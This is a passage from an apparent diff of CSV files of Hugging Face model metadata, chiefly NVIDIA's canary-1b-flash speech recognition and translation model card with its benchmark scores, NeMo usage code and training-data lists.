results: []"", ""widget_data"": null, ""model_index"": [{""name"": ""deepfake-blip-large"", ""results"": []}], ""config"": {""architectures"": [""BlipForConditionalGeneration""], ""model_type"": ""blip"", ""tokenizer_config"": {""cls_token"": ""[CLS]"", ""mask_token"": ""[MASK]"", ""pad_token"": ""[PAD]"", ""sep_token"": ""[SEP]"", ""unk_token"": ""[UNK]""}}, ""transformers_info"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='preprocessor_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_args.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vocab.txt', size=None, blob_id=None, lfs=None)""], ""spaces"": [""deepfakedetection/deepfake_uq""], ""safetensors"": {""parameters"": {""F32"": 469732924}, ""total"": 469732924}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-04-09 17:08:46+00:00"", ""cardData"": ""base_model: Salesforce/blip-image-captioning-large\nlibrary_name: transformers\nlicense: bsd-3-clause\ntags:\n- generated_from_trainer\nmodel-index:\n- name: deepfake-blip-large\n results: []"", ""transformersInfo"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""_id"": ""67f6a1e2e75587812f86583c"", ""modelId"": ""saakshigupta/deepfake-blip-large"", ""usedStorage"": 5637036744}",1,,0,,0,,0,,0,"deepfakedetection/deepfake_uq, huggingface/InferenceSupport/discussions/new?title=saakshigupta/deepfake-blip-large&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bsaakshigupta%2Fdeepfake-blip-large%5D(%2Fsaakshigupta%2Fdeepfake-blip-large)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A",2
|
bloom_finetunes_20250422_180448.csv
ADDED
|
The diff for this file is too large to render.
See raw diff
|
|
|
canary-1b-flash_finetunes_20250426_221535.csv_finetunes_20250426_221535.csv
ADDED
|
@@ -0,0 +1,641 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
nvidia/canary-1b-flash,"---
|
| 3 |
+
license: cc-by-4.0
|
| 4 |
+
language:
|
| 5 |
+
- en
|
| 6 |
+
- de
|
| 7 |
+
- es
|
| 8 |
+
- fr
|
| 9 |
+
library_name: nemo
|
| 10 |
+
datasets:
|
| 11 |
+
- librispeech_asr
|
| 12 |
+
- fisher_corpus
|
| 13 |
+
- Switchboard-1
|
| 14 |
+
- WSJ-0
|
| 15 |
+
- WSJ-1
|
| 16 |
+
- National-Singapore-Corpus-Part-1
|
| 17 |
+
- National-Singapore-Corpus-Part-6
|
| 18 |
+
- vctk
|
| 19 |
+
- voxpopuli
|
| 20 |
+
- europarl
|
| 21 |
+
- multilingual_librispeech
|
| 22 |
+
- mozilla-foundation/common_voice_8_0
|
| 23 |
+
- MLCommons/peoples_speech
|
| 24 |
+
thumbnail: null
|
| 25 |
+
tags:
|
| 26 |
+
- automatic-speech-recognition
|
| 27 |
+
- automatic-speech-translation
|
| 28 |
+
- speech
|
| 29 |
+
- audio
|
| 30 |
+
- Transformer
|
| 31 |
+
- FastConformer
|
| 32 |
+
- Conformer
|
| 33 |
+
- pytorch
|
| 34 |
+
- NeMo
|
| 35 |
+
- hf-asr-leaderboard
|
| 36 |
+
widget:
|
| 37 |
+
- example_title: Librispeech sample 1
|
| 38 |
+
src: https://cdn-media.huggingface.co/speech_samples/sample1.flac
|
| 39 |
+
- example_title: Librispeech sample 2
|
| 40 |
+
src: https://cdn-media.huggingface.co/speech_samples/sample2.flac
|
| 41 |
+
model-index:
|
| 42 |
+
- name: canary-1b-flash
|
| 43 |
+
results:
|
| 44 |
+
- task:
|
| 45 |
+
name: Automatic Speech Recognition
|
| 46 |
+
type: automatic-speech-recognition
|
| 47 |
+
dataset:
|
| 48 |
+
name: LibriSpeech (other)
|
| 49 |
+
type: librispeech_asr
|
| 50 |
+
config: other
|
| 51 |
+
split: test
|
| 52 |
+
args:
|
| 53 |
+
language: en
|
| 54 |
+
metrics:
|
| 55 |
+
- name: Test WER
|
| 56 |
+
type: wer
|
| 57 |
+
value: 2.87
|
| 58 |
+
- task:
|
| 59 |
+
type: Automatic Speech Recognition
|
| 60 |
+
name: automatic-speech-recognition
|
| 61 |
+
dataset:
|
| 62 |
+
name: SPGI Speech
|
| 63 |
+
type: kensho/spgispeech
|
| 64 |
+
config: test
|
| 65 |
+
split: test
|
| 66 |
+
args:
|
| 67 |
+
language: en
|
| 68 |
+
metrics:
|
| 69 |
+
- name: Test WER
|
| 70 |
+
type: wer
|
| 71 |
+
value: 1.95
|
| 72 |
+
- task:
|
| 73 |
+
type: Automatic Speech Recognition
|
| 74 |
+
name: automatic-speech-recognition
|
| 75 |
+
dataset:
|
| 76 |
+
name: Mozilla Common Voice 16.1
|
| 77 |
+
type: mozilla-foundation/common_voice_16_1
|
| 78 |
+
config: en
|
| 79 |
+
split: test
|
| 80 |
+
args:
|
| 81 |
+
language: en
|
| 82 |
+
metrics:
|
| 83 |
+
- name: Test WER (En)
|
| 84 |
+
type: wer
|
| 85 |
+
value: 6.99
|
| 86 |
+
- task:
|
| 87 |
+
type: Automatic Speech Recognition
|
| 88 |
+
name: automatic-speech-recognition
|
| 89 |
+
dataset:
|
| 90 |
+
name: Mozilla Common Voice 16.1
|
| 91 |
+
type: mozilla-foundation/common_voice_16_1
|
| 92 |
+
config: de
|
| 93 |
+
split: test
|
| 94 |
+
args:
|
| 95 |
+
language: de
|
| 96 |
+
metrics:
|
| 97 |
+
- name: Test WER (De)
|
| 98 |
+
type: wer
|
| 99 |
+
value: 4.09
|
| 100 |
+
- task:
|
| 101 |
+
type: Automatic Speech Recognition
|
| 102 |
+
name: automatic-speech-recognition
|
| 103 |
+
dataset:
|
| 104 |
+
name: Mozilla Common Voice 16.1
|
| 105 |
+
type: mozilla-foundation/common_voice_16_1
|
| 106 |
+
config: es
|
| 107 |
+
split: test
|
| 108 |
+
args:
|
| 109 |
+
language: es
|
| 110 |
+
metrics:
|
| 111 |
+
- name: Test WER (ES)
|
| 112 |
+
type: wer
|
| 113 |
+
value: 3.62
|
| 114 |
+
- task:
|
| 115 |
+
type: Automatic Speech Recognition
|
| 116 |
+
name: automatic-speech-recognition
|
| 117 |
+
dataset:
|
| 118 |
+
name: Mozilla Common Voice 16.1
|
| 119 |
+
type: mozilla-foundation/common_voice_16_1
|
| 120 |
+
config: fr
|
| 121 |
+
split: test
|
| 122 |
+
args:
|
| 123 |
+
language: fr
|
| 124 |
+
metrics:
|
| 125 |
+
- name: Test WER (Fr)
|
| 126 |
+
type: wer
|
| 127 |
+
value: 6.15
|
| 128 |
+
- task:
|
| 129 |
+
type: Automatic Speech Translation
|
| 130 |
+
name: automatic-speech-translation
|
| 131 |
+
dataset:
|
| 132 |
+
name: FLEURS
|
| 133 |
+
type: google/fleurs
|
| 134 |
+
config: en_us
|
| 135 |
+
split: test
|
| 136 |
+
args:
|
| 137 |
+
language: en-de
|
| 138 |
+
metrics:
|
| 139 |
+
- name: Test BLEU (En->De)
|
| 140 |
+
type: bleu
|
| 141 |
+
value: 32.27
|
| 142 |
+
- task:
|
| 143 |
+
type: Automatic Speech Translation
|
| 144 |
+
name: automatic-speech-translation
|
| 145 |
+
dataset:
|
| 146 |
+
name: FLEURS
|
| 147 |
+
type: google/fleurs
|
| 148 |
+
config: en_us
|
| 149 |
+
split: test
|
| 150 |
+
args:
|
| 151 |
+
language: en-de
|
| 152 |
+
metrics:
|
| 153 |
+
- name: Test BLEU (En->Es)
|
| 154 |
+
type: bleu
|
| 155 |
+
value: 22.6
|
| 156 |
+
- task:
|
| 157 |
+
type: Automatic Speech Translation
|
| 158 |
+
name: automatic-speech-translation
|
| 159 |
+
dataset:
|
| 160 |
+
name: FLEURS
|
| 161 |
+
type: google/fleurs
|
| 162 |
+
config: en_us
|
| 163 |
+
split: test
|
| 164 |
+
args:
|
| 165 |
+
language: en-de
|
| 166 |
+
metrics:
|
| 167 |
+
- name: Test BLEU (En->Fr)
|
| 168 |
+
type: bleu
|
| 169 |
+
value: 41.22
|
| 170 |
+
- task:
|
| 171 |
+
type: Automatic Speech Translation
|
| 172 |
+
name: automatic-speech-translation
|
| 173 |
+
dataset:
|
| 174 |
+
name: FLEURS
|
| 175 |
+
type: google/fleurs
|
| 176 |
+
config: de_de
|
| 177 |
+
split: test
|
| 178 |
+
args:
|
| 179 |
+
language: de-en
|
| 180 |
+
metrics:
|
| 181 |
+
- name: Test BLEU (De->En)
|
| 182 |
+
type: bleu
|
| 183 |
+
value: 35.5
|
| 184 |
+
- task:
|
| 185 |
+
type: Automatic Speech Translation
|
| 186 |
+
name: automatic-speech-translation
|
| 187 |
+
dataset:
|
| 188 |
+
name: FLEURS
|
| 189 |
+
type: google/fleurs
|
| 190 |
+
config: es_419
|
| 191 |
+
split: test
|
| 192 |
+
args:
|
| 193 |
+
language: es-en
|
| 194 |
+
metrics:
|
| 195 |
+
- name: Test BLEU (Es->En)
|
| 196 |
+
type: bleu
|
| 197 |
+
value: 23.32
|
| 198 |
+
- task:
|
| 199 |
+
type: Automatic Speech Translation
|
| 200 |
+
name: automatic-speech-translation
|
| 201 |
+
dataset:
|
| 202 |
+
name: FLEURS
|
| 203 |
+
type: google/fleurs
|
| 204 |
+
config: fr_fr
|
| 205 |
+
split: test
|
| 206 |
+
args:
|
| 207 |
+
language: fr-en
|
| 208 |
+
metrics:
|
| 209 |
+
- name: Test BLEU (Fr->En)
|
| 210 |
+
type: bleu
|
| 211 |
+
value: 33.42
|
| 212 |
+
- task:
|
| 213 |
+
type: Automatic Speech Translation
|
| 214 |
+
name: automatic-speech-translation
|
| 215 |
+
dataset:
|
| 216 |
+
name: COVOST
|
| 217 |
+
type: covost2
|
| 218 |
+
config: de_de
|
| 219 |
+
split: test
|
| 220 |
+
args:
|
| 221 |
+
language: de-en
|
| 222 |
+
metrics:
|
| 223 |
+
- name: Test BLEU (De->En)
|
| 224 |
+
type: bleu
|
| 225 |
+
value: 39.33
|
| 226 |
+
- task:
|
| 227 |
+
type: Automatic Speech Translation
|
| 228 |
+
name: automatic-speech-translation
|
| 229 |
+
dataset:
|
| 230 |
+
name: COVOST
|
| 231 |
+
type: covost2
|
| 232 |
+
config: es_419
|
| 233 |
+
split: test
|
| 234 |
+
args:
|
| 235 |
+
language: es-en
|
| 236 |
+
metrics:
|
| 237 |
+
- name: Test BLEU (Es->En)
|
| 238 |
+
type: bleu
|
| 239 |
+
value: 41.86
|
| 240 |
+
- task:
|
| 241 |
+
type: Automatic Speech Translation
|
| 242 |
+
name: automatic-speech-translation
|
| 243 |
+
dataset:
|
| 244 |
+
name: COVOST
|
| 245 |
+
type: covost2
|
| 246 |
+
config: fr_fr
|
| 247 |
+
split: test
|
| 248 |
+
args:
|
| 249 |
+
language: fr-en
|
| 250 |
+
metrics:
|
| 251 |
+
- name: Test BLEU (Fr->En)
|
| 252 |
+
type: bleu
|
| 253 |
+
value: 41.43
|
| 254 |
+
metrics:
|
| 255 |
+
- wer
|
| 256 |
+
- bleu
|
| 257 |
+
- comet
|
| 258 |
+
pipeline_tag: automatic-speech-recognition
|
| 259 |
+
---
|
| 260 |
+
|
| 261 |
+
# Canary 1B Flash
|
| 262 |
+
|
| 263 |
+
<style>
|
| 264 |
+
img {
|
| 265 |
+
display: inline;
|
| 266 |
+
}
|
| 267 |
+
</style>
|
| 268 |
+
|
| 269 |
+
## Description:
|
| 270 |
+
NVIDIA NeMo Canary Flash [1] is a family of multilingual multi-tasking models based on Canary architecture [2] that achieve state-of-the-art performance on multiple speech benchmarks. With 883 million parameters and an inference speed of more than 1000 RTFx (on open-asr-leaderboard datasets), canary-1b-flash supports automatic speech-to-text recognition (ASR) in four languages (English, German, French, Spanish) and translation from English to German/French/Spanish and from German/French/Spanish to English with or without punctuation and capitalization (PnC). Additionally, canary-1b-flash offers an experimental feature for word-level and segment-level timestamps in English, German, French, and Spanish.
|
| 271 |
+
This model is released under the permissive CC-BY-4.0 license and is available for commercial use.
|
| 272 |
+
|
| 273 |
+
|
| 274 |
+
## Model Architecture:
|
| 275 |
+
Canary is an encoder-decoder model with FastConformer [3] Encoder and Transformer Decoder [4]. With audio features extracted from the encoder, task tokens such as \<target language\>, \<task\>, \<toggle timestamps\> and \<toggle PnC\> are fed into the Transformer Decoder to trigger the text generation process. Canary uses a concatenated tokenizer [5] from individual SentencePiece [6] tokenizers of each language, which makes it easy to scale up to more languages. The canary-1b-flash model has 32 encoder layers and 4 decoder layers, leading to a total of 883M parameters. For more details about the architecture, please refer to [1].
|
| 276 |
+
|
| 277 |
+
## NVIDIA NeMo
|
| 278 |
+
|
| 279 |
+
To train, fine-tune or transcribe with canary-1b-flash, you will need to install [NVIDIA NeMo](https://github.com/NVIDIA/NeMo).
|
| 280 |
+
|
| 281 |
+
## How to Use this Model
|
| 282 |
+
|
| 283 |
+
The model is available for use in the NeMo Framework [7], and can be used as a pre-trained checkpoint for inference or for fine-tuning on another dataset.
|
| 284 |
+
|
| 285 |
+
Please refer to [our tutorial](https://github.com/NVIDIA/NeMo/blob/main/tutorials/asr/Canary_Multitask_Speech_Model.ipynb) for more details.
|
| 286 |
+
|
| 287 |
+
A few inference examples are listed below:
|
| 288 |
+
|
| 289 |
+
### Loading the Model
|
| 290 |
+
|
| 291 |
+
```python
|
| 292 |
+
from nemo.collections.asr.models import EncDecMultiTaskModel
|
| 293 |
+
# load model
|
| 294 |
+
canary_model = EncDecMultiTaskModel.from_pretrained('nvidia/canary-1b-flash')
|
| 295 |
+
# update decode params
|
| 296 |
+
decode_cfg = canary_model.cfg.decoding
|
| 297 |
+
decode_cfg.beam.beam_size = 1
|
| 298 |
+
canary_model.change_decoding_strategy(decode_cfg)
|
| 299 |
+
```
|
| 300 |
+
|
| 301 |
+
## Input:
|
| 302 |
+
**Input Type(s):** Audio <br>
|
| 303 |
+
**Input Format(s):** .wav or .flac files<br>
|
| 304 |
+
**Input Parameters(s):** 1D <br>
|
| 305 |
+
**Other Properties Related to Input:** 16000 Hz Mono-channel Audio, Pre-Processing Not Needed <br>
|
| 306 |
+
|
| 307 |
+
Input to canary-1b-flash can be either a list of paths to audio files or a jsonl manifest file.
|
| 308 |
+
|
| 309 |
+
If the input is a list of paths, canary-1b-flash assumes that the audio is English and transcribes it. I.e., canary-1b-flash default behavior is English ASR.
|
| 310 |
+
```python
|
| 311 |
+
output = canary_model.transcribe(
|
| 312 |
+
['path1.wav', 'path2.wav'],
|
| 313 |
+
batch_size=16, # batch size to run the inference with
|
| 314 |
+
pnc='yes', # generate output with Punctuation and Capitalization
|
| 315 |
+
)
|
| 316 |
+
|
| 317 |
+
predicted_text_1 = output[0].text
|
| 318 |
+
|
| 319 |
+
```
|
| 320 |
+
|
| 321 |
+
canary-1b-flash can also generate word and segment level timestamps
|
| 322 |
+
```python
|
| 323 |
+
output = canary_model.transcribe(
|
| 324 |
+
['filepath.wav'],
|
| 325 |
+
timestamps='yes', # generate output with timestamps
|
| 326 |
+
)
|
| 327 |
+
|
| 328 |
+
predicted_text = output[0].text
|
| 329 |
+
word_level_timestamps = output[0].timestamp['word']
|
| 330 |
+
segment_level_timestamps = output[0].timestamp['segment']
|
| 331 |
+
|
| 332 |
+
```
|
| 333 |
+
For audio files longer than 10 seconds, we recommend using longform inference script (explained in next section) with `chunk_len_in_secs=10.0` to generate timestamps.
|
| 334 |
+
|
| 335 |
+
|
| 336 |
+
To use canary-1b-flash for transcribing other supported languages or perform Speech-to-Text translation or provide word-level timestamps, specify the input as jsonl manifest file, where each line in the file is a dictionary containing the following fields:
|
| 337 |
+
|
| 338 |
+
```yaml
|
| 339 |
+
# Example of a line in input_manifest.json
|
| 340 |
+
{
|
| 341 |
+
""audio_filepath"": ""/path/to/audio.wav"", # path to the audio file
|
| 342 |
+
""source_lang"": ""en"", # language of the audio input, set `source_lang`==`target_lang` for ASR, choices=['en','de','es','fr']
|
| 343 |
+
""target_lang"": ""en"", # language of the text output, choices=['en','de','es','fr']
|
| 344 |
+
""pnc"": ""yes"", # whether to have PnC output, choices=['yes', 'no']
|
| 345 |
+
""timestamp"": ""yes"", # whether to output word-level timestamps, choices=['yes', 'no']
|
| 346 |
+
}
|
| 347 |
+
```
|
| 348 |
+
|
| 349 |
+
and then use:
|
| 350 |
+
```python
|
| 351 |
+
output = canary_model.transcribe(
|
| 352 |
+
""<path to input manifest file>"",
|
| 353 |
+
batch_size=16, # batch size to run the inference with
|
| 354 |
+
)
|
| 355 |
+
```
|
| 356 |
+
|
| 357 |
+
### Longform inference with Canary-1B-flash:
|
| 358 |
+
Canary models are designed to handle input audio smaller than 40 seconds. In order to handle longer audios, NeMo includes [speech_to_text_aed_chunked_infer.py](https://github.com/NVIDIA/NeMo/blob/main/examples/asr/asr_chunked_inference/aed/speech_to_text_aed_chunked_infer.py) script that handles chunking, performs inference on the chunked files, and stitches the transcripts.
|
| 359 |
+
|
| 360 |
+
The script will perform inference on all `.wav` files in `audio_dir`. Alternatively you can also pass a path to a manifest file as shown above. The decoded output will be saved at `output_json_path`.
|
| 361 |
+
|
| 362 |
+
```
|
| 363 |
+
python scripts/speech_to_text_aed_chunked_infer.py \
|
| 364 |
+
pretrained_name=""nvidia/canary-1b-flash"" \
|
| 365 |
+
audio_dir=$audio_dir \
|
| 366 |
+
output_filename=$output_json_path \
|
| 367 |
+
chunk_len_in_secs=40.0 \
|
| 368 |
+
batch_size=1 \
|
| 369 |
+
decoding.beam.beam_size=1 \
|
| 370 |
+
timestamps=False
|
| 371 |
+
```
|
| 372 |
+
|
| 373 |
+
**Note** that for longform inference with timestamps, it is recommended to use `chunk_len_in_secs` of 10 seconds.
|
| 374 |
+
|
| 375 |
+
|
| 376 |
+
## Output:
|
| 377 |
+
**Output Type(s):** Text <br>
|
| 378 |
+
**Output Format:** Text output as a string (w/ timestamps) depending on the task chosen for decoding <br>
|
| 379 |
+
**Output Parameters:** 1-Dimensional text string <br>
|
| 380 |
+
**Other Properties Related to Output:** May Need Inverse Text Normalization; Does Not Handle Special Characters <br>
|
| 381 |
+
|
| 382 |
+
|
| 383 |
+
## Software Integration:
|
| 384 |
+
**Runtime Engine(s):**
|
| 385 |
+
* NeMo - main <br>
|
| 386 |
+
|
| 387 |
+
**Supported Hardware Microarchitecture Compatibility:** <br>
|
| 388 |
+
* [NVIDIA Ampere] <br>
|
| 389 |
+
* [NVIDIA Blackwell] <br>
|
| 390 |
+
* [NVIDIA Jetson] <br>
|
| 391 |
+
* [NVIDIA Hopper] <br>
|
| 392 |
+
* [NVIDIA Lovelace] <br>
|
| 393 |
+
* [NVIDIA Pascal] <br>
|
| 394 |
+
* [NVIDIA Turing] <br>
|
| 395 |
+
* [NVIDIA Volta] <br>
|
| 396 |
+
|
| 397 |
+
**[Preferred/Supported] Operating System(s):** <br>
|
| 398 |
+
* [Linux] <br>
|
| 399 |
+
* [Linux 4 Tegra] <br>
|
| 400 |
+
* [Windows] <br>
|
| 401 |
+
|
| 402 |
+
## Model Version(s):
|
| 403 |
+
canary-1b-flash <br>
|
| 404 |
+
|
| 405 |
+
|
| 406 |
+
# Training and Evaluation Datasets:
|
| 407 |
+
|
| 408 |
+
## Training Dataset:
|
| 409 |
+
|
| 410 |
+
The canary-1b-flash model is trained on a total of 85K hrs of speech data. It consists of 31K hrs of public data, 20K hrs collected by [Suno](https://suno.ai/), and 34K hrs of in-house data.
|
| 411 |
+
The datasets below include conversations, videos from the web and audiobook recordings.
|
| 412 |
+
|
| 413 |
+
**Data Collection Method:**
|
| 414 |
+
* Human <br>
|
| 415 |
+
|
| 416 |
+
**Labeling Method:**
|
| 417 |
+
* Hybrid: Human, Automated <br>
|
| 418 |
+
|
| 419 |
+
The constituents of public data are as follows.
|
| 420 |
+
|
| 421 |
+
#### English (25.5k hours)
|
| 422 |
+
- Librispeech 960 hours
|
| 423 |
+
- Fisher Corpus
|
| 424 |
+
- Switchboard-1 Dataset
|
| 425 |
+
- WSJ-0 and WSJ-1
|
| 426 |
+
- National Speech Corpus (Part 1, Part 6)
|
| 427 |
+
- VCTK
|
| 428 |
+
- VoxPopuli (EN)
|
| 429 |
+
- Europarl-ASR (EN)
|
| 430 |
+
- Multilingual Librispeech (MLS EN) - 2,000 hour subset
|
| 431 |
+
- Mozilla Common Voice (v7.0)
|
| 432 |
+
- People's Speech - 12,000 hour subset
|
| 433 |
+
- Mozilla Common Voice (v11.0) - 1,474 hour subset
|
| 434 |
+
|
| 435 |
+
#### German (2.5k hours)
|
| 436 |
+
- Mozilla Common Voice (v12.0) - 800 hour subset
|
| 437 |
+
- Multilingual Librispeech (MLS DE) - 1,500 hour subset
|
| 438 |
+
- VoxPopuli (DE) - 200 hr subset
|
| 439 |
+
|
| 440 |
+
#### Spanish (1.4k hours)
|
| 441 |
+
- Mozilla Common Voice (v12.0) - 395 hour subset
|
| 442 |
+
- Multilingual Librispeech (MLS ES) - 780 hour subset
|
| 443 |
+
- VoxPopuli (ES) - 108 hour subset
|
| 444 |
+
- Fisher - 141 hour subset
|
| 445 |
+
|
| 446 |
+
